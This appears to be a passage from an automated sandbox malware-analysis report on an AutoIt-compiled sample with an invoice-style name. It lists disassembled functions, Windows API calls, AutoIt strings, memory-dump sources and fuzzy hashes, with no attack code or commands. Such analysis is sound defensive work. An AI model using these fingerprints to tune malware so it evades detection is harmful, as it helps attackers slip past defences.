                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1553b90280301759e4476f6f46f6e1222df5113213de57256db7c47e741b5193
                                                                            • Instruction ID: d131ee106b710f70e48a0757fb4b791a78483e32039a5d9bd5b91b43b96fad80
                                                                            • Opcode Fuzzy Hash: 1553b90280301759e4476f6f46f6e1222df5113213de57256db7c47e741b5193
                                                                            • Instruction Fuzzy Hash: 7A227831D049AACBDF388B56E59437C77A1FB40318F28906BD84EAB492DB70DC91E741
                                                                            Function 00EF21C5 Relevance: .3, Instructions: 345COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction ID: 5742148dc02cf7023f59d9eeaa5c73558b55bd538db995048de2e13b1a79b0c6
                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                            • Instruction Fuzzy Hash: DDC1A83220509B4ADF2D463A843403EFBA15EA27B631A279DD6B3EB1D4EF10CA25D610
                                                                            Function 00EF25FA Relevance: .3, Instructions: 341COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction ID: 3e6b04c5aad3dd803b6165c12df29f8d88e99a286fab83e5a42c3956769ecbaf
                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                            • Instruction Fuzzy Hash: 43C1783220519B49DF2D463AC43413EFAA15EE27B631A279DD6B3EF1D4EF10CA25D610
                                                                            Function 00EF1978 Relevance: .3, Instructions: 323COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction ID: c310c53acd42416dad9c0144caa73035bc6c56270554d2d5189b98763fdbaf59
                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                            • Instruction Fuzzy Hash: 75C1863220519F89DF2D463AC47413EFBA15EA27B631A27DDD5B3EB1C4EE10CA25D620
                                                                            Function 00F5356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,00F5F910), ref: 00F53627
                                                                            • IsWindowVisible.USER32(?), ref: 00F5364B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            • Opcode ID: 2adca31ecba42b8e89def0fc3db7525552b02a4ea9e199c612975dad6d98fe0f
                                                                            • Instruction ID: 788e48ca71aa3c34d745072d3380e8a5a3ed4fd55bb5b65fb6566a6bfa98d824
                                                                            • Opcode Fuzzy Hash: 2adca31ecba42b8e89def0fc3db7525552b02a4ea9e199c612975dad6d98fe0f
                                                                            • Instruction Fuzzy Hash: 97D19E356087019BCB04EF14C951AAE7BE1AF94395F084459FD826B3A3DB35EE0EEB41
                                                                            Function 00F5A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00F5A630
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00F5A661
                                                                            • GetSysColor.USER32(0000000F), ref: 00F5A66D
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00F5A687
                                                                            • SelectObject.GDI32(?,00000000), ref: 00F5A696
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A6C1
                                                                            • GetSysColor.USER32(00000010), ref: 00F5A6C9
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00F5A6D0
                                                                            • FrameRect.USER32(?,?,00000000), ref: 00F5A6DF
                                                                            • DeleteObject.GDI32(00000000), ref: 00F5A6E6
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00F5A731
                                                                            • FillRect.USER32(?,?,00000000), ref: 00F5A763
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5A78E
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(00000012), ref: 00F5A903
                                                                              • Part of subcall function 00F5A8CA: SetTextColor.GDI32(?,?), ref: 00F5A907
                                                                              • Part of subcall function 00F5A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F5A91D
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(0000000F), ref: 00F5A928
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(00000011), ref: 00F5A945
                                                                              • Part of subcall function 00F5A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5A953
                                                                              • Part of subcall function 00F5A8CA: SelectObject.GDI32(?,00000000), ref: 00F5A964
                                                                              • Part of subcall function 00F5A8CA: SetBkColor.GDI32(?,00000000), ref: 00F5A96D
                                                                              • Part of subcall function 00F5A8CA: SelectObject.GDI32(?,?), ref: 00F5A97A
                                                                              • Part of subcall function 00F5A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A999
                                                                              • Part of subcall function 00F5A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5A9B0
                                                                              • Part of subcall function 00F5A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F5A9C5
                                                                              • Part of subcall function 00F5A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5A9ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 3521893082-0
                                                                            • Opcode ID: 2f673b4c02b2b64389e1ae5528919624f91340418ca292d1da868941e88af9a8
                                                                            • Instruction ID: dcca96bb4e8f8f904f3e495457182dfe40d6d8c359663e710dae1d808d056f48
                                                                            • Opcode Fuzzy Hash: 2f673b4c02b2b64389e1ae5528919624f91340418ca292d1da868941e88af9a8
                                                                            • Instruction Fuzzy Hash: 16917D72408705AFC7119F64DC08A5B7BA9FF88332F140B69FA62961E1D731D948EB52
                                                                            Function 00F474AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 00F474DE
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F4759D
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F475DB
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F475ED
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F47633
                                                                            • GetClientRect.USER32(00000000,?), ref: 00F4763F
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F47683
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F47692
                                                                            • GetStockObject.GDI32(00000011), ref: 00F476A2
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F476A6
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F476B6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F476BF
                                                                            • DeleteDC.GDI32(00000000), ref: 00F476C8
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F476F4
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F4770B
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F47746
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F4775A
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F4776B
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F4779B
                                                                            • GetStockObject.GDI32(00000011), ref: 00F477A6
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F477B1
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F477BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 7f2f7578a30d1390ab918605194566c59e49f97f61f391a7ca12d922f030a6a9
                                                                            • Instruction ID: 20bcf0fdc79cc9a1f20776158d111ae4a5e0311cfe8f8fa112085e409f0bc808
                                                                            • Opcode Fuzzy Hash: 7f2f7578a30d1390ab918605194566c59e49f97f61f391a7ca12d922f030a6a9
                                                                            • Instruction Fuzzy Hash: EFA1AFB1A00609BFEB14DBA4DC4AFAE7BB9EB08711F004155FA14EB2E0C770AD05DB60
                                                                            Function 00F3AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3AD1E
                                                                            • GetDriveTypeW.KERNEL32(?,00F5FAC0,?,\\.\,00F5F910), ref: 00F3ADFB
                                                                            • SetErrorMode.KERNEL32(00000000,00F5FAC0,?,\\.\,00F5F910), ref: 00F3AF59
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 535a5878811bfd38f2263f40dd2a744d000927e6e00d4d4a222ea62d2128e85d
                                                                            • Instruction ID: 039532551d7fc32b62c0d15cede40d66c1a7b7d091aaf868fbb3651ce2bb6cb5
                                                                            • Opcode Fuzzy Hash: 535a5878811bfd38f2263f40dd2a744d000927e6e00d4d4a222ea62d2128e85d
                                                                            • Instruction Fuzzy Hash: 515190B5A44209AB8B14EB22CD82DBD73A1EF48770F604157E487A72D1DA35DD42FB43
                                                                            Function 00ED68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-86951937
                                                                            • Opcode ID: d28385f35eebd3f759dafaf82c07e74cfe59faa2d66f5e5bb65c3d26f3f6a05a
                                                                            • Instruction ID: 51636642f1f08f029c2ba03d87cafc5aa8742f4fd1cd291ea873586be6dde8d1
                                                                            • Opcode Fuzzy Hash: d28385f35eebd3f759dafaf82c07e74cfe59faa2d66f5e5bb65c3d26f3f6a05a
                                                                            • Instruction Fuzzy Hash: E88107B1640219AACF20AB60DC52FBF3BA8EF05750F046026FD457B2D2EB71DA46E251
                                                                            Function 00ED2C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?), ref: 00ED2CA2
                                                                            • DeleteObject.GDI32(00000000), ref: 00ED2CE8
                                                                            • DeleteObject.GDI32(00000000), ref: 00ED2CF3
                                                                            • DestroyCursor.USER32(00000000), ref: 00ED2CFE
                                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00ED2D09
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F0C43B
                                                                            • 6FCB0200.COMCTL32(?,000000FF,?), ref: 00F0C474
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F0C89D
                                                                              • Part of subcall function 00ED1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2036,?,00000000,?,?,?,?,00ED16CB,00000000,?), ref: 00ED1B9A
                                                                            • SendMessageW.USER32(?,00001053), ref: 00F0C8DA
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F0C8F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyMessageSendWindow$DeleteObject$B0200CursorInvalidateMoveRect
                                                                            • String ID: 0
                                                                            • API String ID: 3010530511-4108050209
                                                                            • Opcode ID: dac927f1406f37c82dba5cf591c00321610571f0f30f63f94814fadd5b5aef7c
                                                                            • Instruction ID: c23ccd68e8c678293a32772646e3368ce2d55434f42e03fc22f27144217a5302
                                                                            • Opcode Fuzzy Hash: dac927f1406f37c82dba5cf591c00321610571f0f30f63f94814fadd5b5aef7c
                                                                            • Instruction Fuzzy Hash: 56129E30600201DFDB21CF24C884BA9BBE1FF54311F58466AEA59DB2A2C731EC46FB91
                                                                            Function 00F59A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F59AD2
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F59B8B
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F59BA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: 0bdb897fc212ee98299e7f1c9592764f371ba4454814855936a0de0b6d255ebd
                                                                            • Instruction ID: b7a2d8f9abf2eed26430bd6589af099ceedb8b4aa894ecb2a04d0b4fed70eacd
                                                                            • Opcode Fuzzy Hash: 0bdb897fc212ee98299e7f1c9592764f371ba4454814855936a0de0b6d255ebd
                                                                            • Instruction Fuzzy Hash: 0602F031508301EFD729CF14C849BAABBE5FF49322F04452DFA99D62A1C7B4D948EB52
                                                                            Function 00F5A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 00F5A903
                                                                            • SetTextColor.GDI32(?,?), ref: 00F5A907
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00F5A91D
                                                                            • GetSysColor.USER32(0000000F), ref: 00F5A928
                                                                            • CreateSolidBrush.GDI32(?), ref: 00F5A92D
                                                                            • GetSysColor.USER32(00000011), ref: 00F5A945
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5A953
                                                                            • SelectObject.GDI32(?,00000000), ref: 00F5A964
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00F5A96D
                                                                            • SelectObject.GDI32(?,?), ref: 00F5A97A
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A999
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5A9B0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00F5A9C5
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5A9ED
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F5AA14
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00F5AA32
                                                                            • DrawFocusRect.USER32(?,?), ref: 00F5AA3D
                                                                            • GetSysColor.USER32(00000011), ref: 00F5AA4B
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00F5AA53
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F5AA67
                                                                            • SelectObject.GDI32(?,00F5A5FA), ref: 00F5AA7E
                                                                            • DeleteObject.GDI32(?), ref: 00F5AA89
                                                                            • SelectObject.GDI32(?,?), ref: 00F5AA8F
                                                                            • DeleteObject.GDI32(?), ref: 00F5AA94
                                                                            • SetTextColor.GDI32(?,?), ref: 00F5AA9A
                                                                            • SetBkColor.GDI32(?,?), ref: 00F5AAA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 8fce0a85ace68467ca416adb09dfd99af98dffab013f9588fbddf2a272aba463
